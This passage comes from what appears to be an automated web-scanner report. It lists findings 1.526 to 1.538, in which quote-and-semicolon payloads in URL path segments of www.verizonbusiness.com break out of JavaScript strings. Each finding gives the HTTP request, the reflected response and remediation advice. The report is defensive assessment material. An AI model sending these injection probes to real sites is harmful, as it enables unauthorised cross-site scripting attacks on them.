The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92500"%3bc06ef5deb5 was submitted in the REST URL parameter 1. This input was echoed as 92500";c06ef5deb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mx92500"%3bc06ef5deb5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:37 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/mx92500";c06ef5deb5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.526. http://www.verizonbusiness.com/mx/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /mx/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2020'%3b5fd3757eccf was submitted in the REST URL parameter 1. This input was echoed as c2020';5fd3757eccf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mxc2020'%3b5fd3757eccf/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:29 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/mxc2020';5fd3757eccf/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.527. http://www.verizonbusiness.com/nl/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fecdf"%3b586cafd539e was submitted in the REST URL parameter 1. This input was echoed as fecdf";586cafd539e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nlfecdf"%3b586cafd539e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nlfecdf";586cafd539e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.528. http://www.verizonbusiness.com/nl/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a068'%3b2845184fe90 was submitted in the REST URL parameter 1. This input was echoed as 8a068';2845184fe90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl8a068'%3b2845184fe90/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:43 GMT
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/nl8a068';2845184fe90/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.529. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27331"%3b277730a9280 was submitted in the REST URL parameter 1. This input was echoed as 27331";277730a9280 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl27331"%3b277730a9280/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40641
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nl27331";277730a9280/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.530. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50d4'%3b8d8d7fd253 was submitted in the REST URL parameter 1. This input was echoed as a50d4';8d8d7fd253 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nla50d4'%3b8d8d7fd253/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40639
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/nla50d4';8d8d7fd253/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.531. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32102"%3b762bae8912b was submitted in the REST URL parameter 2. This input was echoed as 32102";762bae8912b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl/solutions32102"%3b762bae8912b/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41160
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nl/solutions32102";762bae8912b/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.532. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6caa'%3bcf4fdcd51 was submitted in the REST URL parameter 2. This input was echoed as d6caa';cf4fdcd51 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl/solutionsd6caa'%3bcf4fdcd51/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:32 GMT
Content-Type: text/html
Content-Length: 41156
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/nl/solutionsd6caa';cf4fdcd51/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.533. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18bcc'%3bf429cc4a32d was submitted in the REST URL parameter 3. This input was echoed as 18bcc';f429cc4a32d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl/solutions/var18bcc'%3bf429cc4a32d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42372
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/nl/solutions/var18bcc';f429cc4a32d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.534. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa719"%3b8d39f9bd01d was submitted in the REST URL parameter 3. This input was echoed as fa719";8d39f9bd01d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl/solutions/varfa719"%3b8d39f9bd01d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42372
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nl/solutions/varfa719";8d39f9bd01d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.535. http://www.verizonbusiness.com/no/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /no/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2ab8"%3bba895b94910 was submitted in the REST URL parameter 1. This input was echoed as f2ab8";ba895b94910 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nof2ab8"%3bba895b94910/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nof2ab8";ba895b94910/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.536. http://www.verizonbusiness.com/no/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /no/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79142'%3b216be360872 was submitted in the REST URL parameter 1. This input was echoed as 79142';216be360872 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /no79142'%3b216be360872/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/no79142';216be360872/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.537. http://www.verizonbusiness.com/nz/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nz/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a399f'%3b4c3c9fce10b was submitted in the REST URL parameter 1. This input was echoed as a399f';4c3c9fce10b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nza399f'%3b4c3c9fce10b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/nza399f';4c3c9fce10b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.538. http://www.verizonbusiness.com/nz/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nz/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70895"%3b894c67a9f8d was submitted in the REST URL parameter 1. This input was echoed as 70895";894c67a9f8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

